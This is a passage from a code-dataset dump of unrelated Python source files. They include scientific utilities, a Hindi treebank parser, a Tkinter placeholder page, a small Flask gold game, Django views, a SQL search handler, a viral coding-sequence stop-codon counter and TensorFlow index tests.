p_cal(Q_distribution_1, q))\r\n Q_distribution_2 = generate_Q(eig=eig_rsvd)\r\n print(\"The p-value of RSVD is:\", p_cal(Q_distribution_2, q))","sub_path":"BST234_Project_Code/Eigenvalue.py","file_name":"Eigenvalue.py","file_ext":"py","file_size_in_byte":4992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"401043719","text":"import numpy as np\nfrom scipy.sparse import csr_matrix\n\n\ndef interpolD1D(m, c):\n \"\"\"Computes a m+2 by m+1 one-dimensional interpolator of 2nd-order\n\n Arguments:\n m (int): Number of cells\n c (float): Left interpolation coeff.\n\n Returns:\n :obj:`ndarray` containing coefficients of interpolator\n \"\"\"\n\n assert m >= 4, \"m must be >= 4, given: {}\".format(m)\n assert (c >= 0) and (c <= 1), \"0 <= c <= 1, given: {}\".format(c)\n\n \"\"\"\n Dimensions of I\n \"\"\"\n n_rows = m + 2\n n_cols = m + 1\n\n I = csr_matrix((n_rows, n_cols), dtype=np.float)\n\n I[0, 0] = 1.\n I[-1, -1] = 1.\n\n \"\"\"\n Average between two continuous cells\n \"\"\"\n avg = np.array([c, 1.-c], dtype=np.float)\n\n j = 0\n for i in range(1, n_cols):\n I[i, j:j+2] = avg\n j = j + 1\n\n return I\n\n\nif __name__ == '__main__':\n print(interpolD1D(5, 0.5))\n","sub_path":"core/interpolD1D.py","file_name":"interpolD1D.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"638963051","text":"import os\nimport re\nimport pickle \n\npath = \"/home/saurav/Documents/hindi_morph_analysis/HDTB_pre_release_version-0.05/IntraChunk/CoNLL/utf/news_articles_and_heritage/Testing/\"\n\ncnt = 0\nsentences = []\nrootwords = []\nfeatures = []\nn_files = 0\n\n# sentences = pickle.load(open('sentences_intra', 'rb'))\n# rootwords = pickle.load(open('rootwords_intra', 'rb'))\n# features = pickle.load(open('features_intra', 'rb'))\n\nfor filename in os.listdir(path):\n\tn_files += 1\n\twith open(os.path.join(path, filename)) as fn:\n\t\t\n\t\twords = []\n\t\troots = []\n\t\ttags = []\n\t\tfor line in fn:\n\t\t\tline = line.rstrip()\t\n\t\t\t# import pdb\n\t\t\t# pdb.set_trace()\n\t\t\tif(line): # keep adding words till blank line\n\t\t\t\tlis = re.split(r'\\t+', line.rstrip('\\t'))\n\t\t\t\n\t\t\t\tif cnt == 5:\n\t\t\t\t\tprint(words)\n\t\t\t\tif lis[1] == 'NULL' or lis[2] == 'null' or lis[1]== '' or lis[2] == '':\n\t\t\t\t\tcontinue \n\t\t\t\twords.insert(len(words),lis[1])\n\t\t\t\troots.insert(len(roots), lis[2])\n\t\t\t\ttags.insert(len(tags), lis[5])\n\t\t\t\tcontinue\n\n\t\t\telse: # encounter a blank line; add all previous words to form a sentence\n\t\t\t\t\n\t\t\t\t# clear() deletes the references to the lists\n\t\t\t\t# so make copy of lists \n\t\t\t\ttempwords = []\n\t\t\t\ttemproots = []\n\t\t\t\ttemptags = []\n\t\t\t\tfor i in range(len(words)):\n\t\t\t\t\ttempwords.append(words[i])\n\t\t\t\t\ttemproots.append(roots[i])\n\t\t\t\t\ttemptags.append(tags[i])\n\n\t\t\t\tsentences.append(tempwords)\n\t\t\t\trootwords.append(temproots)\n\t\t\t\tfeatures.append(temptags)\n\t\t\t\n\t\t\t\tcnt += 1\n\t\t\t\twords.clear()\n\t\t\t\troots.clear()\n\t\t\t\ttags.clear()\n\nprint(\"total files: \", n_files)\nprint(cnt)\nprint(\"total sentences: \", len(sentences))\nprint(len(rootwords))\nprint(len(features))\n\nprint(len([i for item in rootwords for i in item]))\n\npickle.dump(sentences, open('sentences_test', 'wb'))\npickle.dump(rootwords, open('rootwords_test', 'wb'))\npickle.dump(features, open('features_test', 'wb'))\n\n'''\n######## calculate stats #########\n\n# mean sentence len\nslen = 0\nfor s in sentences:\n\t#print(s)\n\tslen += len(s)\nprint(\"Mean len: \", slen/len(sentences))\n\n# no of unique words\nall_words = [item for sentence in sentences for item in sentence]\nprint(\"Total words: \", len(all_words))\nwords_set = set(all_words)\nprint(\"Unique words: \", len(words_set))\n'''\n\n\n","sub_path":"urdu/preProcessing/parse_data_test.py","file_name":"parse_data_test.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"638449198","text":"# Not Ready Yet Frame Script\n\n# This script represents the frame to be displayed when\n# a part of the frame is still in development and hasn't been\n# completed yet.\n\n\n#IMPORTS\nfrom tkinter import Frame\nfrom tkinter import font\nimport Main_Frame #This one does not cause a \"Circular Import Error\"\nimport cGUIf, os\n\n#GLOBAL CONSTANTS\nFONTS = {\n \"lucida grande\" : \"Lucida Grande\",\n \"cambria\" : \"Cambria\",\n \"times new roman\" : \"Times New Roman\"\n }\n\nICON_FOLDER = \"pics\"\n\nICON_NAMES = (\"neutral_face\",\"bananinsin\",\"back_arrow\")\n\nICON_PATHS = (os.path.join(ICON_FOLDER,\"icon_neutral_face.png\"),\n os.path.join(ICON_FOLDER,\"icon_JR016.png\"),\n os.path.join(ICON_FOLDER,\"icon_left_arrow.png\"))\n\n\n#Not Ready Yet Frame/Page class\nclass Not_Ready_Yet_Frame(Frame):\n \"\"\"Frame to display when something is not ready yet..\"\"\"\n\n def __init__(self,master,width,height):\n \"\"\"Initialize this frame with all the required information.\"\"\"\n\n #Save inherited arguments\n self.master = master\n self.width = width\n self.height = height\n\n #Call parent's constructor method\n super(Not_Ready_Yet_Frame,self).__init__(master,\n width = width,\n height = height)\n\n #Dict of images\n self.__pics = self.pics_dict\n\n #Add the UI elements to the frame\n self.build_UI()\n\n @property\n def pics_dict(self):\n \"\"\"Dictionary that contains the images of this frame.\"\"\"\n\n #Add a for loop when the images of this frame are more than 3\n\n img_dict = {}\n \n neutral_pic = cGUIf.get_TkImage(ICON_PATHS[0],128,128)\n banana_pic = cGUIf.get_TkImage(ICON_PATHS[1],100,100)\n arrow_pic = cGUIf.get_TkImage(ICON_PATHS[2],32,32)\n \n img_dict.update({ICON_NAMES[0] : neutral_pic,\n ICON_NAMES[1] : banana_pic,\n ICON_NAMES[2] : arrow_pic})\n\n return img_dict\n\n def switch_frames(self):\n \"\"\"Switch back to the Main Frame.\"\"\"\n\n #Create new frame\n\n mainFrame = Main_Frame.Main_Frame(self.master,\n self.width,\n self.height)\n mainFrame.place(x = 0, y = 0)\n\n #Destroy this frame\n self.place_forget()\n self.destroy()\n \n\n def build_UI(self):\n \"\"\"Contains the UI widgets of this frame.\"\"\"\n\n #Common local coordinates to change the UI positions\n common_x = 0\n common_y = 0\n\n #Tell the user this frame is not ready to use yet\n\n #Create a big \"Sorry\" label\n self.sorryFont = font.Font(family = FONTS[\"lucida grande\"], size = 35)\n self.sorryLabel = cGUIf.get_TextLabel(self,\n \"Sorry\",\n self.sorryFont,\n 250 + common_x,\n 30 + common_y)\n \n\n #Create a label to hold the indifferent face\n self.neutralFaceIcon = cGUIf.get_ImgLabel(self,\n self.__pics[\"neutral_face\"],\n 243 + common_x,\n 110 + common_y)\n\n #Create explanatory labels that says what's going on\n self.explanationFont = font.Font(family = FONTS[\"times new roman\"], size = 15)\n self.explanationLabel1 = cGUIf.get_TextLabel(self,\n \"This part of the FCA has not been developed yet\",\n self.explanationFont,\n 120 + common_x,\n 270 + common_y)\n\n self.explanationLabel2 = cGUIf.get_TextLabel(self,\n \"JR016 is busy doing other things (Most of them irrevelant)\",\n self.explanationFont,\n 80 + common_x,\n 310 + common_y)\n\n self.explanationLabel3 = cGUIf.get_TextLabel(self,\n \"Please wait until this part of the FCA is ready\",\n self.explanationFont,\n 130 + common_x,\n 350 + common_y)\n\n self.explanationLabel4 = cGUIf.get_TextLabel(self,\n \"JR016 appreciates your patience\",\n self.explanationFont,\n 180 + common_x,\n 390 + common_y)\n\n #Add the JR016 Github icon\n self.bananinsinIcon = cGUIf.get_ImgLabel(self,\n self.__pics[\"bananinsin\"],\n 255 + common_x,\n 420 + common_y)\n \n\n #Add a label that says \"Back\" for the back button\n self.backFont = font.Font(family = FONTS[\"cambria\"],size = 12)\n self.backLabel = cGUIf.get_TextLabel(self,\n \"Back\",\n self.backFont,\n 80 + common_x,\n 489 + common_y)\n\n #Add a back button to go back to the main Frame\n self.backButton = cGUIf.get_Button(self,\n \"\",\n self.switch_frames,\n 30 + common_x,\n 480 + common_y)\n \n self.backButton.configure(image = self.__pics[\"back_arrow\"])\n\n \n\n \n \n \n\n \n\ndef main(): \n \"\"\"Run warning if run directly\"\"\"\n\n warning_message = \"This script contains the code that builds the \" \\\n + \"Doc page of the FCA (File Converter App).\" \\\n + \"\\n\\nThis script should NOT be run DIRECTLY.\" \\\n + \"\\n\\nPlease, import it in another script.\"\n\n cGUIf.show_warning(\"Import warning\",warning_message)\n\n\n\n\nif __name__ == \"__main__\": \n main()\n","sub_path":"notReadyYetFrame.py","file_name":"notReadyYetFrame.py","file_ext":"py","file_size_in_byte":6769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"188162223","text":"from flask import Flask, render_template, request, redirect, session\nimport random\nimport datetime \napp = Flask(__name__)\napp.secret_key = 'gold' # set a secret key for security purposes\n\n\n\n@app.route('/')\ndef home() :\n break_html = \"
\"\n if 'gold' in session:\n y = \"yo\"\n else :\n session['activities'] = \"\"\n session['gold'] = 0\n print (session)\n return render_template('index.html', break_h=break_html)\n\n@app.route('/process_money', methods=['POST'])\ndef process() :\n print (request.form)\n date_time = datetime.datetime.now()\n date_time_str = date_time.strftime(\"%b %d %Y %H:%M:%S\")\n if request.form['location'] == \"farm\" :\n amount = random.randint(10,20)\n session['gold'] += int(amount)\n print(\"Gold found at the farm\")\n session['activities'] = \"
Earned \"+str(amount)+\" gold at the farm! (\"+date_time_str+\")
\"+session['activities']\n elif request.form['location'] == \"cave\" :\n amount = random.randint(5, 10)\n session['gold'] += int(amount)\n print(\"Gold found at the cave\")\n session['activities'] = \"
Earned \"+str(amount)+\" gold at the cave! (\"+date_time_str+\")
\"+session['activities']\n elif request.form['location'] == \"house\" :\n amount = random.randint(2, 5)\n session['gold'] += int(amount)\n print(\"Gold found at the house\")\n session['activities'] = \"
Earned \"+str(amount)+\" gold at the house! (\"+date_time_str+\")
\"+session['activities']\n elif request.form['location'] == \"casino\" :\n amount = random.randint(-50, 50)\n session['gold'] += int(amount)\n print(\"Gold found at the casino\")\n if amount >= 0 :\n session['activities'] = \"
Entered a Casino and won \"+str(amount)+\" gold.... Awesome! (\"+date_time_str+\")
\"+session['activities']\n else :\n session['activities'] = \"
Entered a Casino and lost \"+str(amount)+\" gold.... Ouch! (\"+date_time_str+\")
\"+session['activities']\n return redirect('/')\n\n@app.route('/reset', methods=['POST']) \ndef reset() :\n session.clear()\n return redirect('/')\n\nif __name__ == \"__main__\" :\n app.run(debug=True)","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"15392984","text":"from django.contrib import messages\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render\nfrom django.urls import reverse_lazy\nfrom django.utils.decorators import method_decorator\nfrom django.views.generic import CreateView, TemplateView\n\nfrom core.core import get_client_ip, update_stats\nfrom core.decorators import check_recaptcha\nfrom core.forms import ContactUsMessageForm\nfrom posts.models import EventPost, Post, ShowreelPost\n\n\nclass IndexView(TemplateView):\n template_name = 'core/home.html'\n\n def get(self, request, *args, **kwargs):\n # update page and click statistics\n update_stats(request, page='Home')\n return super().get(request, *args, **kwargs)\n \n def get_context_data(self, **kwargs):\n # define contenxt data for the homepage\n context = super().get_context_data(**kwargs)\n context['events'] = EventPost.objects.filter(published=True).order_by('-date', '-time')[:4]\n context['posts'] = Post.objects.filter(published=True)\n context['published_showreel_posts'] = ShowreelPost.objects.filter(published=True)\\\n .order_by('-created')[:6]\n return context\n \n\nclass AboutUsView(TemplateView):\n template_name = 'core/about_us.html'\n\n def get(self, request, *args, **kwargs):\n # update page and click statistics\n update_stats(request, page='About Us')\n return super().get(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['team'] = User.objects.filter(is_staff=True)\n return context\n \n\nclass ContactUsView(CreateView):\n form_class = ContactUsMessageForm\n template_name = 'core/contact_us.html'\n success_url = reverse_lazy('beta_contact_us')\n\n def get(self, request, *args, **kwargs):\n # update page and click statistics\n update_stats(request, page='Contact Us')\n return super().get(request, *args, **kwargs)\n\n def form_valid(self, form):\n form.instance.ip = get_client_ip(self.request)\n messages.success(\n self.request, \n 'Thank you for your message %s! We will get back to you.' % form.instance.name)\n return super().form_valid(form)\n\n @method_decorator(check_recaptcha)\n def post(self, request, *args, **kwargs):\n return super().post(request, *args, **kwargs)\n","sub_path":"musikemedia/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"289577761","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCopyright (c) 2016 Ryan Fan\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\nEXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\nMERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\nIN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR\nOTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE\nOR OTHER DEALINGS IN THE SOFTWARE.\n\"\"\"\nimport sys\nimport socket\nimport fcntl\nimport struct\nimport array\nimport ConfigParser\nimport ast\n\nclass MiscUtils:\n @staticmethod\n def encode(msg, stream):\n if isinstance(msg, unicode) and hasattr(stream, 'encoding') and not stream.encoding is None:\n return msg.encode(stream.encoding)\n else:\n return str(msg)\n\n @staticmethod\n def abort(msg):\n \"\"\"\n Abort execution, print ``msg`` to stderr and exit with error status (1.)\n\n This function currently makes use of `SystemExit`_ in a manner that is\n similar to `sys.exit`_ (but which skips the automatic printing to stderr,\n allowing us to more tightly control it via settings).\n\n Therefore, it's possible to detect and recover from inner calls to `abort`\n by using ``except SystemExit`` or similar.\n\n .. _sys.exit: http://docs.python.org/library/sys.html#sys.exit\n .. _SystemExit: http://docs.python.org/library/exceptions.html#exceptions.SystemExit\n \"\"\"\n sys.stderr.write(\"\\nFatal error: %s\\n\" % MiscUtils.encode(msg, sys.stderr))\n sys.stderr.write(\"\\nAborting.\\n\")\n\n # See issue #1318 for details on the below; it lets us construct a\n # valid, useful SystemExit while sidestepping the automatic stderr\n # print (which would otherwise duplicate with the above in a\n # non-controllable fashion).\n e = SystemExit(1)\n e.message = msg\n raise e\n\n @staticmethod\n def import_module(name, package=None):\n \"\"\"Import a module.\n\n The 'package' argument is required when performing a relative import. It\n specifies the package to use as the anchor point from which to resolve the\n relative import to an absolute import.\n\n \"\"\"\n def _resolve_name(name, package, level):\n \"\"\"Return the absolute name of the module to be imported.\"\"\"\n if not hasattr(package, 'rindex'):\n raise ValueError(\"'package' not set to a string\")\n dot = len(package)\n for x in xrange(level, 1, -1):\n try:\n dot = package.rindex('.', 0, dot)\n except ValueError:\n raise ValueError(\"attempted relative import beyond top-level \"\n \"package\")\n return \"%s.%s\" % (package[:dot], name)\n\n if name.startswith('.'):\n if not package:\n raise TypeError(\"relative imports require the 'package' argument\")\n level = 0\n for character in name:\n if character != '.':\n break\n level += 1\n name = _resolve_name(name[level:], package, level)\n __import__(name)\n return sys.modules[name]\n\n @staticmethod\n def load_class(module_path, class_name):\n try:\n mod = MiscUtils.import_module(module_path)\n cls = getattr(mod, class_name)\n except ImportError:\n raise ValueError(\"Module '%s' could not be imported\" % (module_path,))\n\n return cls\n\n @staticmethod\n def load_module(module_path):\n try:\n mod = MiscUtils.import_module(module_path)\n except ImportError:\n raise ValueError(\"Error: Module '%s' could not be imported\" % (module_path,))\n\n return mod\n\nclass _AttributeDict(dict):\n \"\"\"\n Dictionary subclass enabling attribute lookup/assignment of keys/values.\n\n For example::\n\n >>> m = _AttributeDict({'foo': 'bar'})\n >>> m.foo\n 'bar'\n >>> m.foo = 'not bar'\n >>> m['foo']\n 'not bar'\n\n ``_AttributeDict`` objects also provide ``.first()`` which acts like\n ``.get()`` but accepts multiple keys as arguments, and returns the value of\n the first hit, e.g.::\n\n >>> m = _AttributeDict({'foo': 'bar', 'biz': 'baz'})\n >>> m.first('wrong', 'incorrect', 'foo', 'biz')\n 'bar'\n\n \"\"\"\n def __getattr__(self, key):\n try:\n return self[key]\n except KeyError:\n # to conform with __getattr__ spec\n raise AttributeError(key)\n\n def __setattr__(self, key, value):\n self[key] = value\n\n def first(self, *names):\n for name in names:\n value = self.get(name)\n if value:\n return value\n\n\nclass NetUtils(object):\n @staticmethod\n def get_all_interfaces():\n def format_ip(addr):\n return str(ord(addr[0])) + '.' + \\\n str(ord(addr[1])) + '.' + \\\n str(ord(addr[2])) + '.' + \\\n str(ord(addr[3]))\n\n max_possible = 128 # arbitrary. raise if needed.\n bytes = max_possible * 32\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n names = array.array('B', '\\0' * bytes)\n outbytes = struct.unpack('iL', fcntl.ioctl(\n s.fileno(),\n 0x8912, # SIOCGIFCONF\n struct.pack('iL', bytes, names.buffer_info()[0])\n ))[0]\n namestr = names.tostring()\n lst = []\n for i in range(0, outbytes, 40):\n name = namestr[i:i+16].split('\\0', 1)[0]\n addr = namestr[i+20:i+24]\n ip = format_ip(addr)\n lst.append((name, ip))\n\n return lst\n\n @staticmethod\n def get_all_ips():\n ifs = NetUtils.get_all_interfaces()\n ip_list = [ ip for name, ip in ifs ]\n return ip_list\n\n @staticmethod\n def is_local_mode(host):\n ip = socket.gethostbyname(host)\n ip_list = NetUtils.get_all_ips()\n # if we find the ip hostname resolved is configured in localhost\n # then we think it should run locally\n if ip in ip_list:\n return True\n\n return False\n\nclass ConfigUtils(object):\n @staticmethod\n def read_file(conf_file):\n config = ConfigParser.ConfigParser()\n if not config.read(conf_file):\n return None\n\n return config\n\n @staticmethod\n def get_options(config, section):\n options = {}\n for option_name in config.options(section):\n options[option_name] = config.get(section, option_name)\n\n return _AttributeDict(options)\n\n @staticmethod\n def get_option_value(config, section, option, default=None):\n \"\"\"\n Try to get ini file->section->option->value by ConfigParser.get(section, option_name),\n If failed to find the correspoding option name, then it will try what calculated by default()\n e,g:\n For get_option_value(config, 'SERVICE_NGINX', '__type__', default= lambda x:x[:6]),\n if no '__type__' option defined in section 'SERVICE_NGINX',\n if will try default('SERVICE_NGINX') to calcute the option name\n\n :return:\n \"\"\"\n value = None\n try:\n value = config.get(section, option)\n except ConfigParser.NoOptionError:\n value = default\n if callable(default):\n value = default(section)\n\n return value\n\n @staticmethod\n def section_startswith(section, prefix):\n \"\"\"\n Check if section starts with prefix or not\n\n :param section:\n :param prefix:\n :return:\n \"\"\"\n valid_prefixs = (prefix.upper(), prefix.lower())\n if section[:len(prefix)] in valid_prefixs:\n return True\n\n return False\n","sub_path":"nihility/nihility/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"642997415","text":"\nfrom database import *\nfrom settings import *\n\ndef search(request):\n\n query = request.query_string.get(\"query\", [\"\"])[0]\n\n q = database.execute(\"\"\"\n\n SELECT DISTINCT * FROM comments\n LEFT OUTER JOIN\n threads ON\n threads.thread_id = comments.thread_id\n LEFT OUTER JOIN\n users ON\n users.user_id = threads.op_id\n WHERE body LIKE ?\n\n \"\"\", (r\"%\" + str(query) + r\"%\",)).fetchall()\n\n content = \"\"\n if query:\n for result in q:\n content += templates[\"thread_link\"].format(\n thread_id=result[\"thread_id\"],\n title=result[\"title\"],\n username=result[\"username\"],\n timestamp=result[\"timestamp\"])\n\n if content:\n page = templates[\"search\"].format(results=content)\n elif query:\n page = templates[\"search\"].format(results=\"No results found\")\n else:\n page = templates[\"search\"].format(results=\"\")\n\n return request.default_response(page)\n\ndef search_post(request):\n query = request.options.get(\"query\", [\"\"])[0]\n \n return request.redirect_response(\"/search.html?query=\"+str(query))\n","sub_path":"backend/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"477790022","text":"import glob\r\nimport csv\r\n\r\nwith open('AnalyzedCDS.csv','w'): # This part empties Analyzed.csv if it exists\r\n pass\r\n\r\nwith open('AnalyzedCDS.csv', 'w', newline='') as csvfile: #This will first write the complet header\r\n writer = csv.writer(csvfile)\r\n Name = (\"provided by Gürkan Korkmaz\", \"http://orcid.org/0000-0003-1911-027X\")\r\n header = (\"Sequence\", \"TotalCDS\", \"Uncounted\", \"%Uncounted\", \"TGA\", \"TAG\", \"TAA\", \"%TGA\", \"%TAG\", \"%TAA\", \"CDSGC\", \"OffTGA\", \"OffTAG\", \"OffTAA\", \"%OffTGA\", \"%OffTAG\", \"%OffTAA\", 'CDS Gs', 'CDS Cs', 'CDS As', 'CDS Ts', )\r\n writer.writerow(Name)\r\n writer.writerow(header)\r\n#This will print out all files loaded in the same directory\r\nfor filename in glob.glob('*.fna*'):\r\n print(filename)\r\n#Total Number of Coding Sequences\r\n substringCDS = \">\"\r\n Total = (open(filename, 'r').read().count(substringCDS))\r\n#Canonical Stop Codons\r\n substringcanonicalTGA = \"TGA\\n>\"\r\n TGA = (open(filename, 'r').read().count(substringcanonicalTGA))\r\n substringcanonicalTAG = \"TAG\\n>\"\r\n TAG = (open(filename, 'r').read().count(substringcanonicalTAG))\r\n substringcanonicalTAA = \"TAA\\n>\"\r\n TAA = (open(filename, 'r').read().count(substringcanonicalTAA))\r\n RatioTGA = 1 + TGA / (1 + TGA + TAG + TAA)\r\n RatioTAG = 1 + TAG / (1 + TGA + TAG + TAA)\r\n RatioTAA = 1 + TAA / (1 + TGA + TAG + TAA)\r\n#Uncounted Stops\r\n Uncounted = Total - (TGA + TAG +TAA)\r\n RatioUncounted = Uncounted / Total\r\n#GC content\r\n substringcanonicalCDSG = \"G\"\r\n CDSG = (open(filename, 'r').read().count(substringcanonicalCDSG))\r\n substringcanonicalCDSC = \"C\"\r\n CDSC = (open(filename, 'r').read().count(substringcanonicalCDSC))\r\n substringcanonicalCDSA = \"A\"\r\n CDSA = (open(filename, 'r').read().count(substringcanonicalCDSA))\r\n substringcanonicalCDST = \"T\"\r\n CDST = (open(filename, 'r').read().count(substringcanonicalCDST))\r\n GC = (CDSG+CDSC)/(CDSA+CDSC+CDSG+CDST)\r\n#OffFrameTGA\r\n substringOffTGA1 = \"TGA\"\r\n OffTGA1 = (open(filename, 'r').read().count(substringOffTGA1))\r\n substringOffTGA2 = \"TG\\nA\"\r\n OffTGA2 = (open(filename, 'r').read().count(substringOffTGA2))\r\n substringOffTGA3 = \"T\\nGA\"\r\n OffTGA3 = (open(filename, 'r').read().count(substringOffTGA3))\r\n OffTGA = OffTGA1 + OffTGA2 + OffTGA3\r\n#OffFrameTAG\r\n substringOffTAG1 = \"TAG\"\r\n OffTAG1 = (open(filename, 'r').read().count(substringOffTAG1))\r\n substringOffTAG2 = \"TA\\nG\"\r\n OffTAG2 = (open(filename, 'r').read().count(substringOffTAG2))\r\n substringOffTAG3 = \"T\\nAG\"\r\n OffTAG3 = (open(filename, 'r').read().count(substringOffTAG3))\r\n OffTAG = OffTAG1 + OffTAG2 + OffTAG3\r\n#OffFrameTAA\r\n substringOffTAA1 = \"TAA\"\r\n OffTAA1 = (open(filename, 'r').read().count(substringOffTAA1))\r\n substringOffTAA2 = \"TA\\nA\"\r\n OffTAA2 = (open(filename, 'r').read().count(substringOffTAA2))\r\n substringOffTAA3 = \"T\\nAA\"\r\n OffTAA3 = (open(filename, 'r').read().count(substringOffTAA3))\r\n OffTAA = OffTAA1 + OffTAA2 + OffTAA3\r\n#OffFrame Ratio\r\n OffRatioTGA = OffTGA / (OffTGA + OffTAG + OffTAA)\r\n OffRatioTAG = OffTAG / (OffTGA + OffTAG + OffTAA)\r\n OffRatioTAA = OffTAA / (OffTGA + OffTAG + OffTAA)\r\n\r\n#Writes analysis into csv\r\n analyzed = (filename, Total, Uncounted, RatioUncounted, TGA, TAG, TAA, RatioTGA, RatioTAG, RatioTAA, GC, OffTGA, OffTAG, OffTAA, OffRatioTGA, OffRatioTAG, OffRatioTAA, CDSG, CDSC, CDSA, CDST)\r\n#This will write a file named Analyzed.csv in write mode and wont add a newline between writerow's\r\n with open('AnalyzedCDS.csv', 'a', newline='') as csvfile:\r\n writer = csv.writer(csvfile)\r\n writer.writerow(analyzed)\r\n","sub_path":"RawData/ViralAnalysis/CDSAnalysis.py","file_name":"CDSAnalysis.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"557515370","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('core', '0018_glyc_profile'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='profile',\n name='glyc',\n ),\n migrations.AlterField(\n model_name='glyc',\n name='id_user',\n field=models.AutoField(serialize=False, primary_key=True),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='glyc',\n name='time',\n field=models.DateTimeField(default=datetime.datetime(2015, 3, 23, 17, 27, 7, 157000)),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='profile',\n name='birth',\n field=models.DateField(default=datetime.datetime(2015, 3, 23, 17, 27, 7, 157000)),\n preserve_default=True,\n ),\n ]\n","sub_path":"diabon/core/migrations/0019_auto_20150323_1727.py","file_name":"0019_auto_20150323_1727.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"200350352","text":"import numpy\nimport tensorflow as tf\nimport cliffordConvolution as cc\nimport scipy.ndimage\nimport time\nimport operator\nfrom functools import reduce\n\ninpt2 = tf.placeholder(tf.float32, [32,56,56,32,4])\nindexes2 = tf.placeholder(tf.int32, [32,56,56,32])\n\n# with tf.device('gpu:0'):\n# \tout2 = cc.ops.reduceIndex(inpt2, indexes2)\n\nwith tf.device('cpu:0'):\n\tmid2 = cc.ops.reduceIndex(inpt2, indexes2)\n\tout2 = cc.ops.expandIndex(mid2, indexes2, inpt2)\n\nwith tf.device('gpu:0'):\n\tmid = cc.ops.reduceIndex(inpt2, indexes2)\n\tout = cc.ops.expandIndex(mid, indexes2, inpt2)\n\n\ninum = numpy.ones([32,56,56,32], dtype=numpy.int32)\nii = numpy.zeros([32,56,56,32,4], dtype=numpy.float32)\nn = 1\nfor i in range(inum.shape[0]):\n\tfor j in range(inum.shape[1]):\n\t\tfor k in range(inum.shape[2]):\n\t\t\tfor l in range(inum.shape[3]):\n\t\t\t\tind = (numpy.random.rand(1)*4).astype(numpy.int32)[0]\n\t\t\t\tii[i,j,k,l,ind] = n\n\t\t\t\tinum[i,j,k,l] = ind\n\t\t\t\tn += 1\n\n# ii[:,:,:,:,0] = 10\n# ii[:,:,:,:,1] = 0\n# ii[:,:,:,:,2] = 5\n# ii[:,:,:,:,3] = 20\n# i[0] = 0\n# i[1] = 1\n# i[2] = 2\n# i[3] = 3\n\n\nsess = tf.Session()\n\nst1 = time.time()\na = sess.run([mid, out], feed_dict={inpt2: ii, indexes2: inum})\nt1 = time.time()-st1\n\n\na2 = sess.run([mid2, out2], feed_dict={inpt2: ii, indexes2: inum})\n\nnumpy.sum(a[1] != ii)\nnumpy.sum(a2[1] != ii)\n\nfor i in range(a2.shape[0]):\n\tfor j in range(a2.shape[1]):\n\t\tfor k in range(a2.shape[2]):\n\t\t\tfor l in range(a2.shape[3]):\n\t\t\t\tprint(a2[i,j,k,l])\n\nfor i in range(ii.shape[0]):\n\tfor j in range(ii.shape[1]):\n\t\tfor k in range(ii.shape[2]):\n\t\t\tfor l in range(ii.shape[3]):\n\t\t\t\tfor m in range(ii.shape[4]):\n\t\t\t\t\tprint(ii[i,j,k,l,m])\n\n\n0.24456501007080078\n0.24431443214416504","sub_path":"tests/testExpandIndex.py","file_name":"testExpandIndex.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"561014512","text":"import pandas as pd\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom sklearn import linear_model\n\n#create the regressionline function that will plot the regression line\ndef regressionline(model,datatest,labeltest,title):\n\tfig = plt.figure()\n\tax = fig.add_subplot(111)\n\tax.scatter(datatest,labeltest,c='b',alpha=0.5)\n\tax.plot(datatest,model.predict(datatest),c ='r', alpha=0.7)\n\tscore = model.score(datatest,labeltest)\n\ttitle += \" score(R2) 